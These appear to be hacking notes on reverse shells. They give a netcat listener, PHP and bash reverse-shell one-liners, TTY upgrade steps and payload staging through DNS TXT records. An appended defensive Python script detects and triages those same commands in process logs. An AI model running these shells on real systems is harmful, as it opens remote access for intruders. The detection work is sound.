Some hacking

Crash Course on Reverse Shells

Set up a listener:

nc -lv 4444

Commands that connect back to the listener (here on 127.0.0.1, port 4444):

php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1' 2> /dev/null 1> /dev/null

Upgrading to TTY Shell

Upgrading to Interactive Shell

Note: After this, Ctrl-Z and Ctrl-C are no longer handled by your local terminal; they are passed through to the remote shell. Be prepared to lose the terminal you opened.

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash

Take note of the terminal size on your local machine:

stty size

Background your listener with Ctrl-Z and then bring back the process:

stty raw -echo;fg

You may want to run reset afterwards (if you didn't set the right TERM variable, it will prompt you for one).

And set the resolution:

stty rows <ROWS> columns <COLS>

Attacks with DNS TXT records

A script that parses a DNS TXT record can have its attack updated in real time, simply by changing the record.

nslookup "-q=txt" omg.foolsnasty.com | grep -e '".*"'

I suppose that in a similar fashion, one can just host the payload on some server in text form and swap out the file that way instead.
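
Seen from the defending side, every command in these notes leaves a recognizable process command line. The following is an added example (not part of the original notes) that scans constructed process-execution records for those shapes and correlates them per host; the log format, host names, rule names and scores are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Rule names and scores are this example's own labels (assumptions).
RULES = [
    ("bash_dev_tcp", 3, re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    ("php_fsockopen_fd_redirect", 3, re.compile(r"fsockopen\s*\(.*[<>]&\d")),
    ("pty_spawn_upgrade", 2, re.compile(r"pty\.spawn\s*\(")),
    # TXT lookups are routine (SPF, DKIM), so on their own they only score 1.
    ("dns_txt_lookup", 1, re.compile(
        r"\bnslookup\s+\"?-(?:q|querytype|type)=txt\b|\bdig\b[^|;]*\stxt\b", re.I)),
]

# Constructed records in a hypothetical "host=... user=... cmd=..." format.
# The first four command lines are the ones shown in these notes.
SAMPLE_LOG = r'''
host=web01 user=www-data cmd=php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
host=web01 user=www-data cmd=python -c 'import pty;pty.spawn("/bin/bash")'
host=web01 user=www-data cmd=nslookup "-q=txt" omg.foolsnasty.com
host=app02 user=deploy cmd=bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1'
host=mail03 user=postfix cmd=dig +short TXT example.com
host=db04 user=backup cmd=bash -c 'pg_dump app > /dev/null'
'''.strip().splitlines()

LINE = re.compile(r"host=(\S+) user=(\S+) cmd=(.*)")

def match_rules(cmd):
    """Return (name, score) for every rule whose pattern appears in cmd."""
    return [(name, score) for name, score, rx in RULES if rx.search(cmd)]

def triage(lines):
    """Group hits per host. A host is 'alert' if any hit scores 3, or if a
    TXT lookup co-occurs with another indicator; lone low hits are 'review'."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m:
            hits[m.group(1)].extend(match_rules(m.group(3)))
    report = {}
    for host, found in hits.items():
        names = sorted({n for n, _ in found})
        top = max((s for _, s in found), default=0)
        correlated = "dns_txt_lookup" in names and len(names) > 1
        verdict = "alert" if top >= 3 or correlated else "review" if top else "clean"
        report[host] = (verdict, names)
    return report

if __name__ == "__main__":
    for host, (verdict, names) in sorted(triage(SAMPLE_LOG).items()):
        print(f"{host:8} {verdict:7} {', '.join(names) or '-'}")
```

The lone TXT lookup on mail03 is only marked for review, while the same lookup on web01 is escalated because it appears alongside the shell indicators.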